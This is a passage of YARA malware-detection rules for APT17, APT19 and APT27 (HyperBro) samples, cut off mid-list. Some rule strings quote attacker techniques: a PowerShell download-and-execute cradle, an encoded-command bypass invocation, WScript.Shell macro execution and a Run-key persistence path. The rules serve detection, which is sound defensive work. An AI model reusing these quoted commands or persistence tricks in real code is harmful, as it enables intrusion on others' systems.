hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
id = "c2156e68-d5b5-5bd7-858c-2d5e90199287"
strings:
$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
$x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
$s1 = "hWritePipe2 Error:%d" fullword ascii
$s2 = "Not Support This Function!" fullword ascii
$s3 = "Cookie: SESSIONID=%s" fullword ascii
$s4 = "http://0.0.0.0/1" fullword ascii
$s5 = "Content-Type: image/x-png" fullword ascii
$s6 = "Accept-Language: en-US" fullword ascii
$s7 = "IISCMD Error:%d" fullword ascii
$s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 200KB and (
pe.imphash() == "414bbd566b700ea021cfae3ad8f4d9b9" or
1 of ($x*) or
6 of them
)
)
}

View file

@ -0,0 +1,36 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2015-05-14
Identifier: APT17
*/
/* Rule Set ----------------------------------------------------------------- */
rule APT17_Sample_FXSST_DLL {
meta:
description = "Detects Samples related to APT17 activity - file FXSST.DLL"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/ZiJyQv"
date = "2015-05-14"
hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
id = "e4b9b25e-8895-5ba5-b706-bfb6892c16ae"
strings:
$x1 = "Microsoft? Windows? Operating System" fullword wide
$x2 = "fxsst.dll" fullword ascii
$y1 = "DllRegisterServer" fullword ascii
$y2 = ".cSV" fullword ascii
$s1 = "GetLastActivePopup"
$s2 = "Sleep"
$s3 = "GetModuleFileName"
$s4 = "VirtualProtect"
$s5 = "HeapAlloc"
$s6 = "GetProcessHeap"
$s7 = "GetCommandLine"
condition:
uint16(0) == 0x5a4d and filesize < 800KB and
( all of ($x*) or all of ($y*) ) and all of ($s*)
}

View file

@ -0,0 +1,69 @@
/*
Yara Rule Set
Author: Ian.Ahl@fireeye.com @TekDefense, modified by Florian Roth
Date: 2017-06-05
Identifier: APT19
Reference: https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html
*/
rule Beacon_K5om {
meta:
description = "Detects Meterpreter Beacon - file K5om.dll"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html"
date = "2017-06-07"
hash1 = "e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9"
id = "9354d20a-d798-55bf-a735-820f21d4a861"
strings:
$x1 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
$x2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
$x3 = "%d is an x86 process (can't inject x64 content)" fullword ascii
$s1 = "Could not open process token: %d (%u)" fullword ascii
$s2 = "0fd00b.dll" fullword ascii
$s3 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
$s4 = "Could not connect to pipe (%s): %d" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 600KB and ( 1 of ($x*) or 3 of them ) )
}
/* Rule Set ----------------------------------------------------------------- */
rule FE_LEGALSTRIKE_MACRO {
meta:
version=".1"
filetype="MACRO"
author="Ian.Ahl@fireeye.com @TekDefense - modified by Florian Roth"
date="2017-06-02"
description="This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
id = "eb15e5aa-16e5-5c07-a293-ad15c0c09d8e"
strings:
// OBSFUCATION
$ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
// wscript
$wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
$wsobj2 = "Obj.Run " ascii wide
condition:
all of them
}
rule FE_LEGALSTRIKE_RTF {
meta:
version=".1"
filetype="MACRO"
author="joshua.kim@FireEye. - modified by Florian Roth"
date="2017-06-02"
description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
id = "b62ceffa-445f-517e-b86b-56e47876c6c0"
strings:
$lnkinfo = "4c0069006e006b0049006e0066006f"
$encoded1 = "4f4c45324c696e6b"
$encoded2 = "52006f006f007400200045006e007400720079"
$encoded3 = "4f0062006a0049006e0066006f"
$encoded4 = "4f006c0065"
$datastore = "\\*\\datastore"
condition:
uint32be(0) == 0x7B5C7274 and all of them
}

View file

@ -0,0 +1,389 @@
import "pe"
rule APT_RU_APT27_HyperBro_Vftrace_Loader_Jan22_1 {
meta:
description = "Yara rule to detect first Hyperbro Loader Stage, often called vftrace.dll. Detects decoding function."
author = "Bundesamt fuer Verfassungsschutz (modified by Florian Roth)"
date = "2022-01-14"
sharing = "TLP:WHITE"
reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
hash1 = "333B52C2CFAC56B86EE9D54AEF4F0FF4144528917BC1AA1FE1613EFC2318339A"
id = "b049e163-2694-5fb9-a3a3-98cc77bcd0ca"
strings:
$decoder_routine = { 8A ?? 41 10 00 00 8B ?? 28 ?? ?? 4? 3B ?? 72 ?? }
condition:
uint16(0) == 0x5a4d and
filesize < 5MB and
$decoder_routine and
pe.exports("D_C_Support_SetD_File")
}
rule APT_CN_APT27_Compromised_Certficate_Jan22_1 {
meta:
description = "Detects compromised certifcates used by APT27 malware"
author = "Florian Roth (Nextron Systems)"
date = "2022-01-29"
score = 80
reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
id = "f2f015af-219d-51ab-9529-01687a879ebb"
condition:
for any i in (0 .. pe.number_of_signatures) : (
pe.signatures[i].issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and
pe.signatures[i].serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6"
)
}
rule HvS_APT27_HyperBro_Decrypted_Stage2 {
meta:
description = "HyperBro Stage 2 and compressed Stage 3 detection"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Moritz Oettle"
reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
date = "2022-02-07"
hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
id = "039e5d41-eadb-5c53-82cd-20ffd4105326"
strings:
$lznt1_compressed_pe_header_small = { FC B9 00 4D 5A 90 } // This is the lznt1 compressed PE header
$lznt1_compressed_pe_header_large_1 = { FC B9 00 4D 5A 90 00 03 00 00 00 82 04 00 30 FF FF 00 }
$lznt1_compressed_pe_header_large_2 = { 00 b8 00 38 0d 01 00 40 04 38 19 00 10 01 00 00 }
$lznt1_compressed_pe_header_large_3 = { 00 0e 1f ba 0e 00 b4 09 cd 00 21 b8 01 4c cd 21 }
$lznt1_compressed_pe_header_large_4 = { 54 68 00 69 73 20 70 72 6f 67 72 00 61 6d 20 63 }
$lznt1_compressed_pe_header_large_5 = { 61 6e 6e 6f 00 74 20 62 65 20 72 75 6e 00 20 69 }
$lznt1_compressed_pe_header_large_6 = { 6e 20 44 4f 53 20 00 6d 6f 64 65 2e 0d 0d 0a 02 }
condition:
filesize < 200KB and
($lznt1_compressed_pe_header_small at 0x9ce) or (all of ($lznt1_compressed_pe_header_large_*))
}
rule HvS_APT27_HyperBro_Stage3 {
meta:
description = "HyperBro Stage 3 detection - also tested in memory"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Markus Poelloth"
reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
date = "2022-02-07"
modified = "2023-01-07"
hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
id = "b4002777-f129-5177-a8f1-690012a207fa"
strings:
$s1 = "\\cmd.exe /A" wide
$s2 = "vftrace.dll" fullword wide
$s3 = "msmpeng.exe" fullword wide
$s4 = "\\\\.\\pipe\\testpipe" fullword wide
$s5 = "thumb.dat" fullword wide
$g1 = "%s\\%d.exe" fullword wide
$g2 = "https://%s:%d/api/v2/ajax" fullword wide
$g3 = " -k networkservice" fullword wide
$g4 = " -k localservice" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 300KB and
(( 4 of ($s*) ) or (4 of ($g*)))
}
rule HvS_APT27_HyperBro_Stage3_C2 {
meta:
description = "HyperBro Stage 3 C2 path and user agent detection - also tested in memory"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Marc Stroebel"
reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
date = "2022-02-07"
hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
id = "d1fe03b9-440c-5127-9572-dddcd5c9966b"
strings:
$s1 = "api/v2/ajax" ascii wide nocase
$s2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" ascii wide nocase
condition:
all of them
}
rule HvS_APT27_HyperBro_Stage3_Persistence {
meta:
description = "HyperBro Stage 3 registry keys for persistence"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Marko Dorfhuber"
reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
date = "2022-02-07"
hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
id = "2bb1d28b-5fc4-5f0b-b546-c8b8192b0d48"
strings:
$ = "SOFTWARE\\WOW6432Node\\Microsoft\\config_" ascii
$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windefenders" ascii
condition:
1 of them
}
rule HvS_APT27_HyperBro_Encrypted_Stage2 {
meta:
description = "HyperBro Encrypted Stage 2 detection. Looks for all possible one byte shifts of the lznt1 compressed PE header"
license = "https://creativecommons.org/licenses/by-nc/4.0/"
author = "Moritz Oettle"
reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
date = "2022-02-07"
hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
id = "fa4fe057-4c3f-5785-a8d3-588398360996"
strings:
$encrypted_pe_header_shift_0 = { fc b9 00 4d 5a 90 00 03 00 00 00 82 04 00 30 ff ff 00 }
$encrypted_pe_header_shift_1 = { fd ba 01 4e 5b 91 01 04 01 01 01 83 05 01 31 00 00 01 }
$encrypted_pe_header_shift_2 = { fe bb 02 4f 5c 92 02 05 02 02 02 84 06 02 32 01 01 02 }
$encrypted_pe_header_shift_3 = { ff bc 03 50 5d 93 03 06 03 03 03 85 07 03 33 02 02 03 }
$encrypted_pe_header_shift_4 = { 00 bd 04 51 5e 94 04 07 04 04 04 86 08 04 34 03 03 04 }
$encrypted_pe_header_shift_5 = { 01 be 05 52 5f 95 05 08 05 05 05 87 09 05 35 04 04 05 }
$encrypted_pe_header_shift_6 = { 02 bf 06 53 60 96 06 09 06 06 06 88 0a 06 36 05 05 06 }
$encrypted_pe_header_shift_7 = { 03 c0 07 54 61 97 07 0a 07 07 07 89 0b 07 37 06 06 07 }
$encrypted_pe_header_shift_8 = { 04 c1 08 55 62 98 08 0b 08 08 08 8a 0c 08 38 07 07 08 }
$encrypted_pe_header_shift_9 = { 05 c2 09 56 63 99 09 0c 09 09 09 8b 0d 09 39 08 08 09 }
$encrypted_pe_header_shift_10 = { 06 c3 0a 57 64 9a 0a 0d 0a 0a 0a 8c 0e 0a 3a 09 09 0a }
$encrypted_pe_header_shift_11 = { 07 c4 0b 58 65 9b 0b 0e 0b 0b 0b 8d 0f 0b 3b 0a 0a 0b }
$encrypted_pe_header_shift_12 = { 08 c5 0c 59 66 9c 0c 0f 0c 0c 0c 8e 10 0c 3c 0b 0b 0c }
$encrypted_pe_header_shift_13 = { 09 c6 0d 5a 67 9d 0d 10 0d 0d 0d 8f 11 0d 3d 0c 0c 0d }
$encrypted_pe_header_shift_14 = { 0a c7 0e 5b 68 9e 0e 11 0e 0e 0e 90 12 0e 3e 0d 0d 0e }
$encrypted_pe_header_shift_15 = { 0b c8 0f 5c 69 9f 0f 12 0f 0f 0f 91 13 0f 3f 0e 0e 0f }
$encrypted_pe_header_shift_16 = { 0c c9 10 5d 6a a0 10 13 10 10 10 92 14 10 40 0f 0f 10 }
$encrypted_pe_header_shift_17 = { 0d ca 11 5e 6b a1 11 14 11 11 11 93 15 11 41 10 10 11 }
$encrypted_pe_header_shift_18 = { 0e cb 12 5f 6c a2 12 15 12 12 12 94 16 12 42 11 11 12 }
$encrypted_pe_header_shift_19 = { 0f cc 13 60 6d a3 13 16 13 13 13 95 17 13 43 12 12 13 }
$encrypted_pe_header_shift_20 = { 10 cd 14 61 6e a4 14 17 14 14 14 96 18 14 44 13 13 14 }
$encrypted_pe_header_shift_21 = { 11 ce 15 62 6f a5 15 18 15 15 15 97 19 15 45 14 14 15 }
$encrypted_pe_header_shift_22 = { 12 cf 16 63 70 a6 16 19 16 16 16 98 1a 16 46 15 15 16 }
$encrypted_pe_header_shift_23 = { 13 d0 17 64 71 a7 17 1a 17 17 17 99 1b 17 47 16 16 17 }
$encrypted_pe_header_shift_24 = { 14 d1 18 65 72 a8 18 1b 18 18 18 9a 1c 18 48 17 17 18 }
$encrypted_pe_header_shift_25 = { 15 d2 19 66 73 a9 19 1c 19 19 19 9b 1d 19 49 18 18 19 }
$encrypted_pe_header_shift_26 = { 16 d3 1a 67 74 aa 1a 1d 1a 1a 1a 9c 1e 1a 4a 19 19 1a }
$encrypted_pe_header_shift_27 = { 17 d4 1b 68 75 ab 1b 1e 1b 1b 1b 9d 1f 1b 4b 1a 1a 1b }
$encrypted_pe_header_shift_28 = { 18 d5 1c 69 76 ac 1c 1f 1c 1c 1c 9e 20 1c 4c 1b 1b 1c }
$encrypted_pe_header_shift_29 = { 19 d6 1d 6a 77 ad 1d 20 1d 1d 1d 9f 21 1d 4d 1c 1c 1d }
$encrypted_pe_header_shift_30 = { 1a d7 1e 6b 78 ae 1e 21 1e 1e 1e a0 22 1e 4e 1d 1d 1e }
$encrypted_pe_header_shift_31 = { 1b d8 1f 6c 79 af 1f 22 1f 1f 1f a1 23 1f 4f 1e 1e 1f }
$encrypted_pe_header_shift_32 = { 1c d9 20 6d 7a b0 20 23 20 20 20 a2 24 20 50 1f 1f 20 }
$encrypted_pe_header_shift_33 = { 1d da 21 6e 7b b1 21 24 21 21 21 a3 25 21 51 20 20 21 }
$encrypted_pe_header_shift_34 = { 1e db 22 6f 7c b2 22 25 22 22 22 a4 26 22 52 21 21 22 }
$encrypted_pe_header_shift_35 = { 1f dc 23 70 7d b3 23 26 23 23 23 a5 27 23 53 22 22 23 }
$encrypted_pe_header_shift_36 = { 20 dd 24 71 7e b4 24 27 24 24 24 a6 28 24 54 23 23 24 }
$encrypted_pe_header_shift_37 = { 21 de 25 72 7f b5 25 28 25 25 25 a7 29 25 55 24 24 25 }
$encrypted_pe_header_shift_38 = { 22 df 26 73 80 b6 26 29 26 26 26 a8 2a 26 56 25 25 26 }
$encrypted_pe_header_shift_39 = { 23 e0 27 74 81 b7 27 2a 27 27 27 a9 2b 27 57 26 26 27 }
$encrypted_pe_header_shift_40 = { 24 e1 28 75 82 b8 28 2b 28 28 28 aa 2c 28 58 27 27 28 }
$encrypted_pe_header_shift_41 = { 25 e2 29 76 83 b9 29 2c 29 29 29 ab 2d 29 59 28 28 29 }
$encrypted_pe_header_shift_42 = { 26 e3 2a 77 84 ba 2a 2d 2a 2a 2a ac 2e 2a 5a 29 29 2a }
$encrypted_pe_header_shift_43 = { 27 e4 2b 78 85 bb 2b 2e 2b 2b 2b ad 2f 2b 5b 2a 2a 2b }
$encrypted_pe_header_shift_44 = { 28 e5 2c 79 86 bc 2c 2f 2c 2c 2c ae 30 2c 5c 2b 2b 2c }
$encrypted_pe_header_shift_45 = { 29 e6 2d 7a 87 bd 2d 30 2d 2d 2d af 31 2d 5d 2c 2c 2d }
$encrypted_pe_header_shift_46 = { 2a e7 2e 7b 88 be 2e 31 2e 2e 2e b0 32 2e 5e 2d 2d 2e }
$encrypted_pe_header_shift_47 = { 2b e8 2f 7c 89 bf 2f 32 2f 2f 2f b1 33 2f 5f 2e 2e 2f }
$encrypted_pe_header_shift_48 = { 2c e9 30 7d 8a c0 30 33 30 30 30 b2 34 30 60 2f 2f 30 }
$encrypted_pe_header_shift_49 = { 2d ea 31 7e 8b c1 31 34 31 31 31 b3 35 31 61 30 30 31 }
$encrypted_pe_header_shift_50 = { 2e eb 32 7f 8c c2 32 35 32 32 32 b4 36 32 62 31 31 32 }
$encrypted_pe_header_shift_51 = { 2f ec 33 80 8d c3 33 36 33 33 33 b5 37 33 63 32 32 33 }
$encrypted_pe_header_shift_52 = { 30 ed 34 81 8e c4 34 37 34 34 34 b6 38 34 64 33 33 34 }
$encrypted_pe_header_shift_53 = { 31 ee 35 82 8f c5 35 38 35 35 35 b7 39 35 65 34 34 35 }
$encrypted_pe_header_shift_54 = { 32 ef 36 83 90 c6 36 39 36 36 36 b8 3a 36 66 35 35 36 }
$encrypted_pe_header_shift_55 = { 33 f0 37 84 91 c7 37 3a 37 37 37 b9 3b 37 67 36 36 37 }
$encrypted_pe_header_shift_56 = { 34 f1 38 85 92 c8 38 3b 38 38 38 ba 3c 38 68 37 37 38 }
$encrypted_pe_header_shift_57 = { 35 f2 39 86 93 c9 39 3c 39 39 39 bb 3d 39 69 38 38 39 }
$encrypted_pe_header_shift_58 = { 36 f3 3a 87 94 ca 3a 3d 3a 3a 3a bc 3e 3a 6a 39 39 3a }
$encrypted_pe_header_shift_59 = { 37 f4 3b 88 95 cb 3b 3e 3b 3b 3b bd 3f 3b 6b 3a 3a 3b }
$encrypted_pe_header_shift_60 = { 38 f5 3c 89 96 cc 3c 3f 3c 3c 3c be 40 3c 6c 3b 3b 3c }
$encrypted_pe_header_shift_61 = { 39 f6 3d 8a 97 cd 3d 40 3d 3d 3d bf 41 3d 6d 3c 3c 3d }
$encrypted_pe_header_shift_62 = { 3a f7 3e 8b 98 ce 3e 41 3e 3e 3e c0 42 3e 6e 3d 3d 3e }
$encrypted_pe_header_shift_63 = { 3b f8 3f 8c 99 cf 3f 42 3f 3f 3f c1 43 3f 6f 3e 3e 3f }
$encrypted_pe_header_shift_64 = { 3c f9 40 8d 9a d0 40 43 40 40 40 c2 44 40 70 3f 3f 40 }
$encrypted_pe_header_shift_65 = { 3d fa 41 8e 9b d1 41 44 41 41 41 c3 45 41 71 40 40 41 }
$encrypted_pe_header_shift_66 = { 3e fb 42 8f 9c d2 42 45 42 42 42 c4 46 42 72 41 41 42 }
$encrypted_pe_header_shift_67 = { 3f fc 43 90 9d d3 43 46 43 43 43 c5 47 43 73 42 42 43 }
$encrypted_pe_header_shift_68 = { 40 fd 44 91 9e d4 44 47 44 44 44 c6 48 44 74 43 43 44 }
$encrypted_pe_header_shift_69 = { 41 fe 45 92 9f d5 45 48 45 45 45 c7 49 45 75 44 44 45 }
$encrypted_pe_header_shift_70 = { 42 ff 46 93 a0 d6 46 49 46 46 46 c8 4a 46 76 45 45 46 }
$encrypted_pe_header_shift_71 = { 43 00 47 94 a1 d7 47 4a 47 47 47 c9 4b 47 77 46 46 47 }
$encrypted_pe_header_shift_72 = { 44 01 48 95 a2 d8 48 4b 48 48 48 ca 4c 48 78 47 47 48 }
$encrypted_pe_header_shift_73 = { 45 02 49 96 a3 d9 49 4c 49 49 49 cb 4d 49 79 48 48 49 }
$encrypted_pe_header_shift_74 = { 46 03 4a 97 a4 da 4a 4d 4a 4a 4a cc 4e 4a 7a 49 49 4a }
$encrypted_pe_header_shift_75 = { 47 04 4b 98 a5 db 4b 4e 4b 4b 4b cd 4f 4b 7b 4a 4a 4b }
$encrypted_pe_header_shift_76 = { 48 05 4c 99 a6 dc 4c 4f 4c 4c 4c ce 50 4c 7c 4b 4b 4c }
$encrypted_pe_header_shift_77 = { 49 06 4d 9a a7 dd 4d 50 4d 4d 4d cf 51 4d 7d 4c 4c 4d }
$encrypted_pe_header_shift_78 = { 4a 07 4e 9b a8 de 4e 51 4e 4e 4e d0 52 4e 7e 4d 4d 4e }
$encrypted_pe_header_shift_79 = { 4b 08 4f 9c a9 df 4f 52 4f 4f 4f d1 53 4f 7f 4e 4e 4f }
$encrypted_pe_header_shift_80 = { 4c 09 50 9d aa e0 50 53 50 50 50 d2 54 50 80 4f 4f 50 }
$encrypted_pe_header_shift_81 = { 4d 0a 51 9e ab e1 51 54 51 51 51 d3 55 51 81 50 50 51 }
$encrypted_pe_header_shift_82 = { 4e 0b 52 9f ac e2 52 55 52 52 52 d4 56 52 82 51 51 52 }
$encrypted_pe_header_shift_83 = { 4f 0c 53 a0 ad e3 53 56 53 53 53 d5 57 53 83 52 52 53 }
$encrypted_pe_header_shift_84 = { 50 0d 54 a1 ae e4 54 57 54 54 54 d6 58 54 84 53 53 54 }
$encrypted_pe_header_shift_85 = { 51 0e 55 a2 af e5 55 58 55 55 55 d7 59 55 85 54 54 55 }
$encrypted_pe_header_shift_86 = { 52 0f 56 a3 b0 e6 56 59 56 56 56 d8 5a 56 86 55 55 56 }
$encrypted_pe_header_shift_87 = { 53 10 57 a4 b1 e7 57 5a 57 57 57 d9 5b 57 87 56 56 57 }
$encrypted_pe_header_shift_88 = { 54 11 58 a5 b2 e8 58 5b 58 58 58 da 5c 58 88 57 57 58 }
$encrypted_pe_header_shift_89 = { 55 12 59 a6 b3 e9 59 5c 59 59 59 db 5d 59 89 58 58 59 }
$encrypted_pe_header_shift_90 = { 56 13 5a a7 b4 ea 5a 5d 5a 5a 5a dc 5e 5a 8a 59 59 5a }
$encrypted_pe_header_shift_91 = { 57 14 5b a8 b5 eb 5b 5e 5b 5b 5b dd 5f 5b 8b 5a 5a 5b }
$encrypted_pe_header_shift_92 = { 58 15 5c a9 b6 ec 5c 5f 5c 5c 5c de 60 5c 8c 5b 5b 5c }
$encrypted_pe_header_shift_93 = { 59 16 5d aa b7 ed 5d 60 5d 5d 5d df 61 5d 8d 5c 5c 5d }
$encrypted_pe_header_shift_94 = { 5a 17 5e ab b8 ee 5e 61 5e 5e 5e e0 62 5e 8e 5d 5d 5e }
$encrypted_pe_header_shift_95 = { 5b 18 5f ac b9 ef 5f 62 5f 5f 5f e1 63 5f 8f 5e 5e 5f }
$encrypted_pe_header_shift_96 = { 5c 19 60 ad ba f0 60 63 60 60 60 e2 64 60 90 5f 5f 60 }
$encrypted_pe_header_shift_97 = { 5d 1a 61 ae bb f1 61 64 61 61 61 e3 65 61 91 60 60 61 }
$encrypted_pe_header_shift_98 = { 5e 1b 62 af bc f2 62 65 62 62 62 e4 66 62 92 61 61 62 }
$encrypted_pe_header_shift_99 = { 5f 1c 63 b0 bd f3 63 66 63 63 63 e5 67 63 93 62 62 63 }
$encrypted_pe_header_shift_100 = { 60 1d 64 b1 be f4 64 67 64 64 64 e6 68 64 94 63 63 64 }
$encrypted_pe_header_shift_101 = { 61 1e 65 b2 bf f5 65 68 65 65 65 e7 69 65 95 64 64 65 }
$encrypted_pe_header_shift_102 = { 62 1f 66 b3 c0 f6 66 69 66 66 66 e8 6a 66 96 65 65 66 }
$encrypted_pe_header_shift_103 = { 63 20 67 b4 c1 f7 67 6a 67 67 67 e9 6b 67 97 66 66 67 }
$encrypted_pe_header_shift_104 = { 64 21 68 b5 c2 f8 68 6b 68 68 68 ea 6c 68 98 67 67 68 }
$encrypted_pe_header_shift_105 = { 65 22 69 b6 c3 f9 69 6c 69 69 69 eb 6d 69 99 68 68 69 }
$encrypted_pe_header_shift_106 = { 66 23 6a b7 c4 fa 6a 6d 6a 6a 6a ec 6e 6a 9a 69 69 6a }
$encrypted_pe_header_shift_107 = { 67 24 6b b8 c5 fb 6b 6e 6b 6b 6b ed 6f 6b 9b 6a 6a 6b }
$encrypted_pe_header_shift_108 = { 68 25 6c b9 c6 fc 6c 6f 6c 6c 6c ee 70 6c 9c 6b 6b 6c }
$encrypted_pe_header_shift_109 = { 69 26 6d ba c7 fd 6d 70 6d 6d 6d ef 71 6d 9d 6c 6c 6d }
$encrypted_pe_header_shift_110 = { 6a 27 6e bb c8 fe 6e 71 6e 6e 6e f0 72 6e 9e 6d 6d 6e }
$encrypted_pe_header_shift_111 = { 6b 28 6f bc c9 ff 6f 72 6f 6f 6f f1 73 6f 9f 6e 6e 6f }
$encrypted_pe_header_shift_112 = { 6c 29 70 bd ca 00 70 73 70 70 70 f2 74 70 a0 6f 6f 70 }
$encrypted_pe_header_shift_113 = { 6d 2a 71 be cb 01 71 74 71 71 71 f3 75 71 a1 70 70 71 }
$encrypted_pe_header_shift_114 = { 6e 2b 72 bf cc 02 72 75 72 72 72 f4 76 72 a2 71 71 72 }
$encrypted_pe_header_shift_115 = { 6f 2c 73 c0 cd 03 73 76 73 73 73 f5 77 73 a3 72 72 73 }
$encrypted_pe_header_shift_116 = { 70 2d 74 c1 ce 04 74 77 74 74 74 f6 78 74 a4 73 73 74 }
$encrypted_pe_header_shift_117 = { 71 2e 75 c2 cf 05 75 78 75 75 75 f7 79 75 a5 74 74 75 }
$encrypted_pe_header_shift_118 = { 72 2f 76 c3 d0 06 76 79 76 76 76 f8 7a 76 a6 75 75 76 }
$encrypted_pe_header_shift_119 = { 73 30 77 c4 d1 07 77 7a 77 77 77 f9 7b 77 a7 76 76 77 }
$encrypted_pe_header_shift_120 = { 74 31 78 c5 d2 08 78 7b 78 78 78 fa 7c 78 a8 77 77 78 }
$encrypted_pe_header_shift_121 = { 75 32 79 c6 d3 09 79 7c 79 79 79 fb 7d 79 a9 78 78 79 }
$encrypted_pe_header_shift_122 = { 76 33 7a c7 d4 0a 7a 7d 7a 7a 7a fc 7e 7a aa 79 79 7a }
$encrypted_pe_header_shift_123 = { 77 34 7b c8 d5 0b 7b 7e 7b 7b 7b fd 7f 7b ab 7a 7a 7b }
$encrypted_pe_header_shift_124 = { 78 35 7c c9 d6 0c 7c 7f 7c 7c 7c fe 80 7c ac 7b 7b 7c }
$encrypted_pe_header_shift_125 = { 79 36 7d ca d7 0d 7d 80 7d 7d 7d ff 81 7d ad 7c 7c 7d }
$encrypted_pe_header_shift_126 = { 7a 37 7e cb d8 0e 7e 81 7e 7e 7e 00 82 7e ae 7d 7d 7e }
$encrypted_pe_header_shift_127 = { 7b 38 7f cc d9 0f 7f 82 7f 7f 7f 01 83 7f af 7e 7e 7f }
$encrypted_pe_header_shift_128 = { 7c 39 80 cd da 10 80 83 80 80 80 02 84 80 b0 7f 7f 80 }
$encrypted_pe_header_shift_129 = { 7d 3a 81 ce db 11 81 84 81 81 81 03 85 81 b1 80 80 81 }
$encrypted_pe_header_shift_130 = { 7e 3b 82 cf dc 12 82 85 82 82 82 04 86 82 b2 81 81 82 }
$encrypted_pe_header_shift_131 = { 7f 3c 83 d0 dd 13 83 86 83 83 83 05 87 83 b3 82 82 83 }
$encrypted_pe_header_shift_132 = { 80 3d 84 d1 de 14 84 87 84 84 84 06 88 84 b4 83 83 84 }
$encrypted_pe_header_shift_133 = { 81 3e 85 d2 df 15 85 88 85 85 85 07 89 85 b5 84 84 85 }
$encrypted_pe_header_shift_134 = { 82 3f 86 d3 e0 16 86 89 86 86 86 08 8a 86 b6 85 85 86 }
$encrypted_pe_header_shift_135 = { 83 40 87 d4 e1 17 87 8a 87 87 87 09 8b 87 b7 86 86 87 }
$encrypted_pe_header_shift_136 = { 84 41 88 d5 e2 18 88 8b 88 88 88 0a 8c 88 b8 87 87 88 }
$encrypted_pe_header_shift_137 = { 85 42 89 d6 e3 19 89 8c 89 89 89 0b 8d 89 b9 88 88 89 }
$encrypted_pe_header_shift_138 = { 86 43 8a d7 e4 1a 8a 8d 8a 8a 8a 0c 8e 8a ba 89 89 8a }
$encrypted_pe_header_shift_139 = { 87 44 8b d8 e5 1b 8b 8e 8b 8b 8b 0d 8f 8b bb 8a 8a 8b }
$encrypted_pe_header_shift_140 = { 88 45 8c d9 e6 1c 8c 8f 8c 8c 8c 0e 90 8c bc 8b 8b 8c }
$encrypted_pe_header_shift_141 = { 89 46 8d da e7 1d 8d 90 8d 8d 8d 0f 91 8d bd 8c 8c 8d }
$encrypted_pe_header_shift_142 = { 8a 47 8e db e8 1e 8e 91 8e 8e 8e 10 92 8e be 8d 8d 8e }
$encrypted_pe_header_shift_143 = { 8b 48 8f dc e9 1f 8f 92 8f 8f 8f 11 93 8f bf 8e 8e 8f }
$encrypted_pe_header_shift_144 = { 8c 49 90 dd ea 20 90 93 90 90 90 12 94 90 c0 8f 8f 90 }
$encrypted_pe_header_shift_145 = { 8d 4a 91 de eb 21 91 94 91 91 91 13 95 91 c1 90 90 91 }
$encrypted_pe_header_shift_146 = { 8e 4b 92 df ec 22 92 95 92 92 92 14 96 92 c2 91 91 92 }
$encrypted_pe_header_shift_147 = { 8f 4c 93 e0 ed 23 93 96 93 93 93 15 97 93 c3 92 92 93 }
$encrypted_pe_header_shift_148 = { 90 4d 94 e1 ee 24 94 97 94 94 94 16 98 94 c4 93 93 94 }
